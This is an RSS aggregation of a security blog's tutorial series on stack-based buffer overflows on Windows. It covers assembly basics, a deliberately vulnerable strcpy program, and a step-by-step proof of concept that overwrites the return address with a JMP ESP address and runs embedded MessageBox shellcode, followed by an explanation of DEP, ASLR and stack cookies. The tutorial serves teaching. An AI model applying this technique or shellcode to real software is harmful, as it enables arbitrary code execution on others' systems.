RSS Security

🔒
❌ About FreshRSS
There are new articles available, click to refresh the page.
Before yesterdayNytro Security

Hello, world!

8 December 2017 at 09:16

I decided to start a blog.

I will try to write as much as possible, but this will not happen too often.

I will probably talk about my projects, NetRipper and Shellcode Compiler, reverse engineering or exploit development, but I will also try to cover web application security.

Previous blog posts

I previously wrote a few blog posts on securitycafe.ro:

About me

You can find more information about me on the About me page.

 

nytrosecurity

💾

Stack Based Buffer Overflows on x86 (Windows) – Part I

9 December 2017 at 13:35

I wrote this article in Romanian, in 2014, and I decided to translate it, because it is a very detailed introduction in the exploitation of a “Stack Based Buffer Overflow” on x86 (32 bits) Windows.

Introduction

This tutorial is for beginners, but it requires at least some basic knowledge about C/C++ programming in order to understand the concepts.

The system that we will use and exploit the vulnerability on is Windows XP (32 bits – x86) for simplicity reasons: there is not DEP and ASLR, things that will be detailed later.

I would like to start with a short introduction on assembly (ASM) language. It will not be very detailed, but I will shortly describe the concepts required to understand how a “buffer overflow” vulnerability looks like, and how it can be exploited. There are multiple types of buffer overflows, here we will discuss only the easiest to understand one, stack based buffer overflow.

Introduction to ASM

In order to make sure all C/C++ developers will understand, I will explain first what happens with a C/C++ code when it is compiled. Let’s take the following code:

#include <stdio.h>
int main() 
{ 
    puts("RST rullz"); 
    return 0; 
}

The compiler will translate the code into assembly language, which will be translated later into machine code, that can be understood by the processor.

The ASM generated code will look similar to the following one:

PUSH OFFSET [email protected][email protected][email protected] ; /s = "RST rullz"
CALL DWORD PTR DS:[<&MSVCR100.puts>] ; \puts
ADD ESP,4
XOR EAX,EAX
RETN

It is not required to understand it at this time.

This ASM code will be assembled in machine code, such as the following:

68 F4200300    PUSH OFFSET [email protected][email protected][email protected] ; /s = "RST rullz"
FF15 A0200300  CALL DWORD PTR DS:[<&MSVCR100.puts>] ; \puts
83C4 04        ADD ESP,4
33C0           XOR EAX,EAX
C3             RETN

We can see a series of bytes: 0x68 0xF4 0x20 0x03 0x00 0xFF 0x15 0xA0 0x20 0x03 0x00 0x83 0xC4 0x04 0x33 0xC0 0xC3. On the right, we can see the instructions that were assembled to those bytes. In order words, the processor will read the bytes and process them as assembly code.

The processor does not understand the C/C++ variables. It has its own “variables”, more specifically, each processor has its own registers where it can store data.

A few of those registers, are the following:

  • EAX, EBX, ECX, EDX, ESI, EDI – General purpose registers that store data.
  • EIP – Special register: the processor executes each instruction, one by one (such as ASM code). Let’s suppose the first instruction is available at the address 0x10000000. One instruction can have one or more bytes, let’s suppose it has 3 bytes. Initially, the value of this register is 0x10000000. When the processor will execute the instruction, the EIP value will be 0x10000003.
  • ESP – Stack pointer: We will detail this later. For the moment it is enough to mention that a special data region, called stack, will be used by the program, and this register holds the value of the address of the top of the stack. We also have EBP register, which holds the base of the current stack memory.

All these registers can store 4 bytes of memory. The “E” comes from “Extended” as the processors on 16 bits had only registers that could store 16 bits, such as AX, BX, CX, DX. On 64 bits, the registers can hold 64 bits: RAX, RBX etc.

A very important concept that needs to be understood when it comes to assembly language is the stack. The stack is a way to store data, piece by piece (4 bytes pieces of data) where each new added piece is placed on the top of the last one. When the data is removed from the stack, it is removed from the top to the bottom, piece by piece.  Or, how a teacher from college used to tell us, the stack is similar to a stack of plates: you can add one only at the top, and you remove them one by one from the top to the bottom.

The stack is used at the processor level (on 32 bits) because:

  • local variables (inside functions) are placed on the stack
  • function parameters are also placed on the stack

There are also two things that we need to take care when we work with ASM:

  • the processors are little endian: more exactly, if you have a variable x = 0x11223344, this will be stored in memory such as 0x44332211.
  • when we add a new element (4 bytes piece of memory) on the stack, the value of the ESP will be ESP-4! This is important, as the “stack grows to 0”.

We have two ASM instructions that we can use to work with the stack:

  • PUSH – Will place a 4 bytes value on the stack
  • POP – Will remove a 4 bytes value from the stack

For example, we can have the following stack (left is the address, right is the value):

24 - 1111
28 - 2222
32 - 3333

The address on the left will be smaller when we will add new items on the stack. Let’s add two new elements:

PUSH 5555
PUSH 6666

The stack will look like this:

16 - 6666 
20 - 5555 
24 - 1111 
28 - 2222 
32 - 3333

The easiest way to understand this is to consider that ESP, the registers that holds the top of the stack, is to think about it as a “how much space has the stack left to add new elements”.

As we already discussed, PUSH and POP instructions work with the stack. The processor executes instructions in order to do its job and each instruction has its own role. Let’s see some other instructions:

  • MOV – Stores data to a register
  • ADD – Does an addition
  • SUB – Does a substraction
  • CALL – Calls a function
  • RETN – Returns from a function
  • JMP – Jumps to an address
  • XOR – Binary operations, for example XOR EAX, EAX is the equivalent of EAX=0
  • INC – Increments the value by 1 (x++)
  • DEC – Decrements the value by 1 (x–)

There are a lot of other instructions, but these are the most common and easy to understand. Let’s see a few examples:

ADD EAX, 5     ; Adds the value 5 to the EAX register. It is EAX = EAX + 5
SUB EDX, 7     ; Substracts 7 from the value of EDX register. Such as EDX = EDX - 7
CALL puts      ; Calls the "puts" function
RETN           ; Returns from the function
JMP 0x11223344 ; Jumps to the specified address and execute the instructions from there
XOR EBX, EBX   ; The equivalent of EBX = 0
MOV ECX, 3     ; The equivalent of ECX = 3
INC ECX        ; The equivalent of ECX++
DEC ECX        ; The equivalent of ECX--

It should be pretty easy to understand. Now we can also understand what the processor does to print our message.

  • PUSH OFFSET [email protected][email protected] – I replaced the longer string with something simple. It is actually a pointer to the memory location where the “RST rullz” message is placed in memory. The instruction adds on the stack the addres of our string. As a result, the value of the ESP register will be ESP – 4.
  • CALL DWORD PTR DS:[<&MSVCR100.puts>] – Calls the “puts” function from the “MSVCR100” (Microsoft Visual C Runtime v10) library, used by Visual Studio 2010. We will detail later how this instruction works, but before we call a function, we have to add the parameters on the stack (first instruction).
  • ADD ESP, 4 – Since the first instruction will substract 4 bytes from the ESP register value, by doing this we retore those 4 bytes.
  • XOR EAX, EAX – This means EAX = 0. The value returned by a function will be stored in the EAX register (we have return 0 at the end of the code).
  • RETN – As we specified the return value with the previous instruction, we can safely return from the “main” function.

In order to understand better how function call works, let’s take the following example:

#include <stdio.h>
int functie(int a, int b) 
{ 
    return a + b; 
}
int main() 
{ 
    functie(5, 6); 
    return 0; 
}

The “main” function will look in ASM code like this:

PUSH EBP
MOV EBP,ESP
PUSH 6
PUSH 5
CALL SimpleEX.functie
ADD ESP,8
XOR EAX,EAX
POP EBP
RETN

The “functie” function will look like this:

PUSH EBP
MOV EBP,ESP
MOV EAX,DWORD PTR SS:[EBP+8]
ADD EAX,DWORD PTR SS:[EBP+C]
POP EBP
RETN

Note: Visual Studio is smart enough to automatically have the result of the addition (5 + 6 = 11). For tests, you can completely deactivate the compiler optimizations from Properties > C++ > Optimization.

We can see some common instructions for both functions:

  • PUSH EBP – At the beginning of the functions
  • MOV EBP, ESP – At the beginning of the functions
  • POP EBP – At the end of the functions

Well, these instructions have the role to create “stack frames”. They have the role to separate the function calls on the stack, so the EBP and ESP registers (the base and the top of the stack) will contain the stack memory area that is used by the currently called function . With other words, using these instructions, the EBP register will hold the address where the data (local variables) used by the current function begins and the ESP register will holds the address where the data used by the current function ends.

Let’s start with the function that does the addition.

  • MOV EAX,DWORD PTR SS:[EBP+8]
  • ADD EAX,DWORD PTR SS:[EBP+C]

Don’t be scared about the “DWORD PTR SS:[EBP+8]” stuff. As we previously discussed between EBP and ESP we can find the data used by the function. In this case, this data represents the parameters of the function. The parameters are available on the stack and there are relative to the EBP address, at the EBP+8 and EBP+C (0xC == 12).

Also, in ASM, the square braces are used such as “*” in C/C++ when it comes to pointers. As *p means “the value at the address p”, [EBP] means “the value at the address of the EBP register”. It is required to do this because the EBP register contains an address of memory as a value and we need the value that is stored at that memory location.

Other thing to notice is that the “DWORD” specifies that at the specified address there is a 4 bytes value. There are a few types of data that specify the size of the data:

  • BYTE – 1 byte
  • WORD – 2 bytes
  • DWORD – 4 bytes (Double WORD)

The SS (Stack Segment), DS (Data Segment) or CS (Code segment) are other registers that identify different memory regions/segments: stack, data or code, and each of those locations has its own access rights: read, write or execute.

So what those two instructions do? First instruction will place the value of the parameter “a”, the first parameter, in the EAX register. The second instruction will add the value of the second parameter “b”, to the EAX register. So, in the end, the EAX register will contain the “a+b” value and this value will be returned by the function on RETN.

Let’s go now to the function that calls the addition function.

PUSH 6
PUSH 5
CALL SimpleEX.functie
ADD ESP,8

We remember that the function call is “functie(5, 6)”. Well, in order to call a function, we have to do the following:

  1. Put the parameters on the stack, from right to left, so first 6, second 5
  2. Call the function
  3. Clear the space allocated for the parameters (4 bytes * 2 parameters)

So, we place the two parameters on the stack (32 bits or 4 bytes each parameter): first we add 6 to the stack, followed by 5, we call the function and clean the stack. In order to clean the stack, we just add 8 to the ESP value (the two parameters size) in order to restore it to the value before the function call. We previously discussed that it is possible to use POP instruction to remove data from the stack, but in this case, there would be two POP instructions. If we would call a function with 100 parameters, we would have to do 100 POP instructions, and we can do it easier and faster with a single “ADD ESP” instruction.

Note: It is important, but not for the purpose of this article: there are multiple ways to call a function, knwon as “calling conventions”. This method, which requires to place the parameters from the right to the left and clean the stack after the function call is called “cdecl”. Other functions, such as the functions from the Windows operating system, called Windows API (Application Programming Interface) use a different calling convention called “stdcall”, which also requires to place the function parameters on the stack from right to the left, but the cleaning of the stack is done inside the function that is called, not after the “CALL” instruction.

It is also important to understand that when we call a function using the “CALL” instruction, the address of the instruction following the “CALL” instruction is placed on the stack. For example:

00261013 | PUSH 6 ; /Arg2 = 00000006
00261015 | PUSH 5 ; |Arg1 = 00000005
00261017 | CALL SimpleEX.functie ; \functie
0026101C | ADD ESP,8

On the left we can see the memory addresses where the instructions are stored. The PUSH instructions have each 2 bytes. The CALL instruction, available at the address 0x00261017 has 5 bytes. So, the address following this instruction in 0x0026101C (which is 0x00261017 + 5). This is the address that will be pushed on the stack when the CALL instruction is executed.

Before the CALL instruction, the stack will look like this:

24 - 0x5
28 - 0x6
32 - 0x1337 ; Anything we have before the PUSH instructions

After the exection of the CALL instruction, the stack will look like this (the address values are simple to be easier to understand):

20 - 0x0026101C ; The address of the instruction following the CALL instruction
                ; We need to save it in order to be able to know where to return after the function code is executed
                ; This is also code the "return address"
24 - 0x5
28 - 0x6
32 - 0x1337     ; Anything we have before the PUSH instructions

After the return address is placed on the stack, the execution will continue with the function code. The first two instruction, called function “prologue”, are used to create the stack frame for the function called:

PUSH EBP
MOV EBP,ESP

After the PUSH instruction, the stack will look like this;

16 - 32         ; The value of EBP before the function call
20 - 0x0026101C ; The return address, where we will go back at the RETN instruction
24 - 0x5
28 - 0x6
32 - 0x1337     ; Anything we have before the PUSH instructions

After “MOV EBP, ESP” instruction, the EBP will have the value the top of the stack. It is important to note that if we would use local variables inside the function, they will be placed on the stack.

Let’s modify the function to this:

int functie(int a, int b)
{
    int v1 = 3, v2 = 4;
    return a + b;
}

We have now two local variables which are initialized with the values 3 and 4. The new code of the function will contain some new code:

SUB ESP,8                  ; Allocate space on the stack for the two variables, 4 bytes each
MOV DWORD PTR SS:[EBP-4],3 ; Initialize the first variable
MOV DWORD PTR SS:[EBP-8],4 ; Initialize the second variable

The stack will contain now:

08 - 4          ; Second variable
12 - 3          ; First variable
16 - 32         ; The value of EBP before the function call
20 - 0x0026101C ; The return address
24 - 0x5
28 - 0x6
32 - 0x1337     ; Anything we have before the PUSH instructions

As a conclusion, it is important to remember the following:

  • local function variables are placed on the stack
  • the return address is also placed on the stack

If you have any question, before proceeding with the stack based buffer overflow, make sure you have the answers to your questions in order to properly understand the subject.

You can continue this article with the second part.

nytrosecurity

💾

Stack Based Buffer Overflows on x86 (Windows) – Part II

19 December 2017 at 23:17

In the first part of this article, we discussed about the basics that we need to have in order to properly understand this type of vulnerability. As we went through how the compiling process works, how assembly looks like and how the stack works, we can go further and explore how a Stack Based Buffer Overflow vulnerability can be exploited.

Introduction

We previously discussed that the stack (during a function call) contains the following (in the below order, where the “local variables” are stored at the “smallest address” and “function parameters” are stored at the highest address):

  • Local variables of the function (for example 20 bytes)
  • Previous EBP value (to create the stack frame, saved with PUSH EBP)
  • Return address (placed on the stack by the CALL instruction)
  • Parameters of the function (placed on the stack using PUSH instructions)

If you can understand those things, it is easy to understand the Stack Based Buffer Overflow vulnerability. Let’s take the following example. We have the following function, called from “main” function:

#define _CRT_SECURE_NO_WARNINGS

#include "stdafx.h"
#include <stdio.h> 
#include <string.h>

// Function that displays the name 
void Display(char *p_pcName) 
{ 
    // Buffer (local variable) that will store the name 
    char buffer[20]; 
 
    // We copy the name in buffer 
    strcpy(buffer, p_pcName); 
 
    // Display the name 
    printf("Hello: %s", buffer); 
}

// Main function
int main() 
{ 
    Display("111122223333");
}

The program is very simple: it calls the “Display” function with the specified parameter.

We can see the problem here:

char buffer[20];
strcpy(buffer, p_pcName);

We have a local variable, buffer, which can store up to 20 bytes.

It is important to note that “char buffer[20]” is different from “char *buffer=(char*)malloc(20)” or “char *buffer=new char[20]“. Our version specifies that the buffer has 20 bytes which can be direclty allocated on the stack, it is a local variable that can store 20 bytes. The other two versions will dynamically allocate the space for the buffer, but the data will be stored on other memory region called “HEAP“, not on the stack. By the way, there are also “Heap Based Buffer Overflows“, but they are more complicated.

Having a local variable that can store 20 bytes on the stack, we will copy the string specified from the command line in that memory location. What happens if the length of the string received from command line is more that 20? We have a “buffer overflow”. The name of “Stack Based Buffer Overflow” comes from the fact that the buffer is stored on the stack.

Let’s see how the code is compiled. Please note that if you use a modern version of Visual Studio, you might get a totally different result. In order to keep everything simple, we should remove from project settings all optimizations, security features and functionalities that we don’t need.

Below is the compiled code of the main function:

000E1030 | 55             | push ebp            | Save previous EBP
000E1031 | 8B EC          | mov ebp,esp         | Create stack frame 
000E1033 | 68 0C 30 0E 00 | push sbof.E300C     | "111122223333"
000E1038 | E8 C3 FF FF FF | call <sbof.Display> | Call the function
000E103D | 83 C4 04       | add esp,4           | Clean the stack
000E1040 | 33 C0          | xor eax,eax         | eax = 0
000E1042 | 5D             | pop ebp             | Remove stack frame
000E1043 | C3             | ret                 | Return

As you can see, everything is as expected: there is only a PUSH for the “111122223333” string parameter, a function call and the stack is cleaned.

000E1000 | 55             | push ebp                      | 
000E1001 | 8B EC          | mov ebp,esp                   |

000E1003 | 83 EC 14       | sub esp,14                    | Allocate space on the stack for the buffer

000E1006 | 8B 45 08       | mov eax,dword ptr ss:[ebp+8]  | Get in EAX the string parameter address
000E1009 | 50             | push eax                      | Place it on the stack (second parameter)
000E100A | 8D 4D EC       | lea ecx,dword ptr ss:[ebp-14] | Get in EAX the address of the "buffer"
000E100D | 51             | push ecx                      | Place it on the stack (first parameter)
000E100E | E8 06 0C 00 00 | call <sbof.strcpy>            | Call strcpy(buffer, p_pcName); 
000E1013 | 83 C4 08       | add esp,8                     | Clean the stack

000E1016 | 8D 55 EC       | lea edx,dword ptr ss:[ebp-14] | Get in EAX the address of the "buffer"
000E1019 | 52             | push edx                      | Place it on the stack (second parameter)
000E101A | 68 00 30 0E 00 | push sbof.E3000               | "Hello: %s" string
000E101F | E8 6C 00 00 00 | call <sbof.printf>            | Call printf("Hello: %s", buffer);
000E1024 | 83 C4 08       | add esp,8                     | Clean the stack

000E1027 | 8B E5          | mov esp,ebp                   |
000E1029 | 5D             | pop ebp                       |
000E102A | C3             | ret                           |

The function allocates space for 20 bytes (0x14 in hexadecimal) and calls two functions:

  1. strcpy – with two parameters: the buffer and our string (111122223333)
  2. printf – with two parameters: “Hello, %s” string and  our string (111122223333)

Let’s see how the stack will look AFTER the strcpy function call, so after “add esp, 8” instruction:

00B9FED0 | 31313131 | "1111"
00B9FED4 | 32323232 | "2222"
00B9FED8 | 33333333 | "3333"
00B9FEDC | 770F8600 | The buffer has 20 bytes allocated, but there can be any data
00B9FEE0 | 000E12F7 | And those 8 bytes have junk data, as "111122223333" has 12 bytes and we allocated 20

00B9FEE4 | 00B9FEF0 | EBP saved on Display function first instruction
00B9FEE8 | 000E103D | Return address, the instruction after "call Display"
00B9FEEC | 000E300C | "111122223333" parameter for Display function
00B9FEF0 | 00B9FF38 | Previous EBP, from main function

As you can see, first 20 bytes (first 5 lines) represent the content of the “buffer”. We specified a string of 12 bytes (“111122223333”) and the rest of the string has junk data (it is not initialized with NULLs). However, please note that after “3333”, we have the following data: 770F8600. Last byte is a NULL byte and it was added by the “strcpy” function.

Now we can ask the question: “What will happen if the string parameter is longer than 20 bytes”? As you can probably guess, the answer is “We get a stack based buffer overflow”.

Exploitation

Let’s get back to the stack and see what we have there:

  1. The “buffer” (20 bytes)
  2. The Display function’s EBP
  3. The Return Address
  4. The parameter (the string)

What can go wrong? Let’s remember what will happen when a fuction returns (on RETN instruction): the execution continues from the “Return Address”. So, if we overflow the stack and overwrite the “Return Address” with someting else… we can control the execution of the program!

This is what will happen if we will use a string parameter of 28 bytes, instead of the maximum number of 20.

We will modify the call “Display(“111122223333”);” to “Display(“1111222233334444555566667777”);“. The stack will look like this:

00B9FED0 | 31313131 | "1111"
00B9FED4 | 32323232 | "2222"
00B9FED8 | 33333333 | "3333"
00B9FEDC | 34343434 | "4444"
00B9FEE0 | 35353535 | "5555"

00B9FEE4 | 36363636 | "6666" - EBP saved on Display function first instruction
00B9FEE8 | 37373737 | "7777" - Return address, the instruction after "call Display"
00B9FEEC | 000E300C | "111122223333" parameter for Display function
00B9FEF0 | 00B9FF38 | Previous EBP, from main function

This means, that when the execution of the “Display” function will be finished (at the RETN instruction), de execution will jump to the address “0x37373737”. So, in conclusion, the EIP value will be 0x37373737, a value that we control.

After the RETN instruction, the return address will be removed from the stack. This means that the top of the stack, the ESP register, will point to the address: 0x00B9FEEC. We can see that if we use a string larger than 28 bytes (20 bytes buffer + 4 bytes saved EBP + 4 bytes return address) we will overwrite data on stack. Since the ESP value will point to something that we control, how can we easily execute arbitrary code?

There are two things we control:

  1. The return address (EIP)
  2. The data at the top of the stack (ESP)

The easiest solution will be to find a “JMP ESP” instruction. For example, let’s assume that the code of our program, or one of the DLLs, have a JMP ESP instruction at address 0x12345678. What we will do, will be to replace the return address with the address of this instruction (0x012345678) instead of “0x37373737” and we can redirect the execution of the program to the top of the stack, where we can place any code and do whatever we want with the program!

Let’s open the program in x64dbg, an open-source debugger. A debugger is a program that allows you to open a program and step through instructions, allowing you to see at runtime the contents of the memory or the registers values. It is a powerful tool with mutiple features. Looking at the top of SBOF.exe program, we can see our two functions. Below is a screenshot.

x64 example

Click each “PUSH EBP” instructions at the beginning of the functions and press F2. This will place a breakpoint, so when you will run the program in the debugger, it will stop at those instructions. You can also use F7 to stept each instruction or F8 to step each instruction, but on CALL instructions, jump over the function call, do not dig into that one. Pressing F9 will run the program, and the debugger will stop at the selected breakpoints, or if some error will happen. It would be very useful to play around with the debugger to see how powerful are its features.

Now, in order to keep the things simple, we will modify the code to contain the “JMP ESP” instruction. We will add the following function:

// Function that does nothing, just contain jmo
void Nothing()
{
    __asm
    {
        jmp esp;
    }
}

As you can see in the debugger, the program contains also some other instructions and it uses DLLs (such as kernel32.dll, ntdll.dll) which also contain a lot of code. We can use all this code to search for a JMP ESP instruction inside it. Right click, go to “Search for” > “All Modules” > “Command”, type “jmp esp” and press OK.

x64 search jmp

In our case, with the new function that contains the “JMP ESP” instruction, we can find it at the following address:

01371033 | FF E4 | jmp esp |

x64 jmp esp

Please note that you might have totally different addresses since modern operating systems, for security reasons, randomize the memory addresses, you will find more details later, in this article.

So, in order to create a working proof of concept, we will have to do the following, to create the following string:

  1. First 20 bytes will be the buffer
  2. Second 4 bytes will overwrite the saved EBP
  3. Following 4 bytes will be 0x01371033 – the address of the JMP ESP instuction
  4. The next bytes will represent the code we want to execute

So, let’s change the main function to the following:

int main() 
{ 
    Display("111122223333444455556666\x33\x10\x37\x01\xcc\xcc\xcc\xcc");
}

As you can see, we have in our string, the 0x01371033 address, but it is in reverse order! This is because the data is stored as “little endian” in memory, as we discussed in the first part of the article. The following “cc”s, represent the “INT 3” instruction, an instruction that will pause the debugger like we set a breakpoint.

We can replace this with a shellcode. A shellcode is a special code, most of the time written in Assembly, that compiled, it works directly. Normal machine code will not work, because the strings for example are placed in different memory regions and the code knows the addresses of the functions, for a shellcode, the strings will be placed in the same place as the code and the shellcode will find itself the addresses of the functions. If you want to know in detail how a shellcode works on Windows and how you can manually write one, I recommend you the following articles:

  1. Introduction to Windows shellcode development – Part 1
  2. Introduction to Windows shellcode development – Part 2
  3. Introduction to Windows shellcode development – Part 3

In order to keep things simple, we will use an existing shellcode. We can use this one: User32-free Messagebox Shellcode for any Windows version.

We will modify the main function to include this code. It will look like this:

int main() 
{ 
    Display(
        "111122223333444455556666\x33\x10\x37\x01"
        "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"
        "\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"
        "\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"
        "\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e"
        "\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c"
        "\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74"
        "\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe"
        "\x49\x0b\x31\xc0\x51\x50\xff\xd7"
    );
}

As you can see, we have:

  1. Some random data
  2. Followed by the “JMP ESP” address
  3. The shellcode we copied form the above link

Please note that all this data must not contain a NULL byte. As the vulnerable call is a call to “strcpy” function, the “strcpy” function will stop execution when it will encounter the first NULL byte and we will not have all the data copied.

Now, when we will execute this program, this will happen:

x64 shellcode ok

We exploited it! This is the result of the copied shellcode. We managed to execute arbitrary code, code that we supplied and got full access to the execution of the program.

Now, you might think this is not a useful example. Of course it is not, it is for educational purposes. A program might get the string from the command line, or from the network, and the same thing might happen. Here are some common cases where this vulnerability might be present:

  • Getting data from the command line
  • Parsing a document (such as XML, HTML, PDF)
  • Reading data from the network (such as a FTP server, HTTP server)

Protection mechanisms

There are a few protections build to pretect against this type of attacks. All modern compilers and operating systems should have them.

DEP – Data Execution Prevention – Is a protection mechanism that works at both hardware level (NX bit – “No eXecute”) and software level and it does not allow the execution of code from the memory regions that do not the have the “execute” permissions. A memory page can have “read”, “write” and/or “execute” permissions. For example, e memory region containing data, such as strings can have “read” or “read-write” permissions, and a memory region containing code will have “read-execute” permissions. The stack, read-write permissions, is a memory region where it shuld not exist the possibility to execute code from. However, without DEP protection, this is possible, and DEP will protect against execution of code from the stack. As you can probably understand, our shellcode was executed from the stack and this protection will block our attack. It can be enabled in the compiler from “Configuration Properties” > “Linker” > “Advaned” > “Data Execution Prevention (DEP)”.

ALSR – Address Space Layour Randomization, which was introduced in Windows Vista and it is the reason why it is easier to understand this vulnerability on Windows XP, is another protection mechanism that can protect against this type of attacks. As we discussed, the DLL’s and the executable can contain different instructions, such as “JMP ESP” that attackers can use. Before ASLR, the executable and the DLLs where always loaded in memory at the same address. For example, the SBOF.exe code would always start at 0x10002000 and kernel32.dll might be loaded always at some address. This means that attackers can use the instructions from those binaries. But with ASLR, all modules, and also the stack and the heap memory, will be loaded at random addresses. This way, we can find the address of a JMP ESP instruction, but it will not work on other machine as the address will be different (randomly generated), since the module containing the instruction was loaded at a different memory address. It is possible to activate this feature from “Configuration Properties” > “Linker” > “Advaned” > “Randomized Base Address”.

Stack Cookies – This is another protection mechanism, specially build against this type of attacks, and it is offered by the compiler. This works by placing at the beginning of a function a random value called “stack cookie”, before the local variables of the function (such as our buffer). What will happen in a stack based buffer oveflow, will be to overwrite the data following the buffer, and this will also overwrite this random variable. This protection, before the “RETN” instructions, will check the value of the randomly generated stack cookie. If a stack based buffer overflow will occur, the value will be changed and this verification will fail, so the program will forcely stop execution and the shellcode will not be executed. This protection can be configured from  “Configuration Properties” > “C/C++” > “Code Generation” > “Security Check”.

Conclusion

Even if it is not difficult to understand this type of vulnerability, the main difficulty is to learn a few concepts such as Assembly language and how programs work under the hood. Due to existing protection mechanisms, a real-life exploitation of this type of attack is way more difficult. However, there are a few tricks that can be used in certain situations to bypass some of protections (if other are not present) but this is not the purpose of this article.

My suggestion, in order to properly understand this vulnerability, would be to compile a program like this, disable all protections and see what happens. You can modify the size of the buffer but the most important is to go instruction with instruction and understand everything with all the details. You can download the source code from the above example from here.

If you have any questions, please leave a comment here and use the contact email.

nytrosecurity

💾

x64 example

💾

x64 search jmp

💾

x64 jmp esp

💾

x64 shellcode ok

💾

Stack Based Buffer Overflows on x64 (Windows)

24 January 2018 at 19:25

The previous two blog posts describe how a Stack Based Buffer Overflow vulnerability works on x86 (32 bits) Windows. In the first part, you can find a short introduction to x86 Assembly and how the stack works, and on the second part you can understand this vulnerability and find out how to exploit it.

This article will present a similar approach in order to understand how it is possible to exploit this vulnerability on x64 (64 bits) Windows. First part will cover the differences in the Assembly code between x86 and x64 and the different function calling convention, and the second part will detail how these vulnerabilities can be exploited.

ASM for x64

There are multiple differences in Assembly that need to be understood in order to proceed. Here we will talk about the most important changes between x86 and x64 related to what we are going to do.

First of all, the registers are now the following:

  • The general purpose registers are the following: RAX, RBX, RCX, RDX, RSI, RDI, RBP and RSP. They are now 64 bit (8 bytes) instead of 32 bits (4 bytes).
  • The EAX, EBX, ECX, EDX, ESI, EDI, EBP, ESP represent the last 4 bytes of the previously mentioned registers. They hold 32 bits of data.
  • There are a few new registers: R8, R9, R10, R11, R12, R13, R14, R15, also holding 64 bits.
  • It is possible to use R8d, R9d etc. in order to access the last 4 bytes, as you can do it with EAX, EBX etc.
  • Pushing and poping data on the stack will use 64 bits instead of 32 bits

Calling convention

Another important difference is the way functions are called, the calling convention.

Here are the most important things we need to know:

  • First 4 parameters are not placed on the stack. First 4 parameters are specified in the RCX, RDX, R8 and R9 registers.
  • If there are more than 4 parameters, the other parameters are placed on the stack, from left to right.
  • Similar to x86, the return value will be available in the RAX register.
  • The function caller will allocate stack space for the arguments used in registers (called “shadow space” or “home space”). Even if when a function is called the parameters are placed in registers, if the called function needs to modify the registers, it will need some space to store them, and this space will be the stack. The function caller will have to allocate this space before the function call and to deallocate it after the function call. The function caller should allocate at least 32 bytes (for the 4 registers), even if they are not all used.
  • The stack has to be 16 bytes aligned before any call instruction. Some functions might allocate 40 (0x28) bytes on the stack (32 bytes for the 4 registers and 8 bytes to align the stack from previous usage – the return RIP address pushed on the stack) for this purpose. You can find more details here.
  • Some registers are volatile and other are nonvolatile. This means that if we set some values into a register and call some function (e.g. Windows API) the volatile register will probably change while nonvolatile register will preserve their values.

More details about calling convention on Windows can be found here.

Function calling example

Let’s take a simple example in order to understand those things. Below is a function that does a simple addition, and it is called from main.

#include "stdafx.h"

int Add(long x, int y)
{
    int z = x + y;
    return z;
}

int main()
{
    Add(3, 4);
    return 0;
}

Here is a possible output, after removing all optimisations and security features.

Main function:

sub rsp,28
mov edx,4
mov ecx,3
call <consolex64.Add>
xor eax,eax
add rsp,28
ret

We can see the following:

  1. sub rsp,28 – This will allocate 0x28 (40) bytes on the stack, as we previously discussed: 32 bytes for the register arguments and 8 bytes for alignment.
  2. mov edx,4 – This will place in EDX register the second parameter. Since the number is small, there is no need to use RDX, the result is the same.
  3. mov ecx,3 – The value of the first argument is place in ECX register.
  4. call <consolex64.Add> – Call the “Add” function.
  5. xor eax,eax – Set EAX (or RAX) to 0, as it will be the return value of main.
  6. add rsp,28 – Clears the allocated stack space.
  7. ret – Return from main.

Add function:

mov dword ptr ss:[rsp+10],edx
mov dword ptr ss:[rsp+8],ecx
sub rsp,18
mov eax,dword ptr ss:[rsp+28]
mov ecx,dword ptr ss:[rsp+20]
add ecx,eax
mov eax,ecx
mov dword ptr ss:[rsp],eax
mov eax,dword ptr ss:[rsp]
add rsp,18
ret

Let’s see how this function works:

  1. mov dword ptr ss:[rsp+10],edx – As we know, the arguments are passed in ECX and EDX registers. But what if the function needs to use those registers (however, please note that some registers must be preserved by a function call, these registers are the following: RBX, RBP, RDI, RSI, R12, R13, R14 and R15)? In this case, the function will use the “shadow space” (“home space”) allocated by the function caller. With this instruction, the function saves on the shadow space the second argument (the value 4), from EDX register.
  2. mov dword ptr ss:[rsp+8],ecx – Similar to the previous instruction, this one will save on the stack the first argument (value 3) from the ECX register
  3. sub rsp,18 – Allocate 0x18 (or 24) bytes on the stack. This function does not call other function, so it is not needed to allocate at least 32 bytes. Also, since it does not call other functions, it is not required to align the stack to 16 bytes. I am not sure why it allocates 24 bytes, it looks like the “local variables area” on the stack has to be aligned to 16 bytes and the other 8 bytes might be used for the stack alignment (as previously mentioned).
  4. mov eax,dword ptr ss:[rsp+28] – Will place in EAX register the value of the second parameter (value 4).
  5. mov ecx,dword ptr ss:[rsp+20] – Will place in ECX register the value of the first parameter (value 3).
  6. add ecx,eax – Will add to ECX the value of the EAX register, so ECX will become 7.
  7. mov eax,ecx – Will save the same value (the sum) into EAX register.
  8. mov dword ptr ss:[rsp],eax and mov eax,dword ptr ss:[rsp] look like they are some effects of the removed optimizations, they don’t do anything useful.
  9. add rsp,18 – Cleanup the allocated stack space.
  10. ret – Return from the function.

Exploitation

Let’s see now how it would be possible to exploit a Stack Based Buffer Overflow on x64. The idea is similar to x86: we overwrite the stack until we overwrite the return address. At that point we can control program execution. This is the easiest example to understand this vulnerability.

We will have a simple program, such as this one:

void Copy(const char *p)
{
    char buffer[40];
    strcpy(buffer, p);
}

int main()
{
    Copy("Test");
    return 0;
}

We have a 40 bytes buffer and a function that will copy some string on that buffer.

This will be the assembly code of the main function:

sub rsp,28                       ; Allocate space on the stack
lea rcx,qword ptr ds:[1400021F0] ; Put in RCX the string ("test")
call <consolex64.Copy>           ; Call the Copy function
xor eax,eax                      ; EAX = 0, return value
add rsp,28                       ; Cleanup the stack space
ret                              ; return

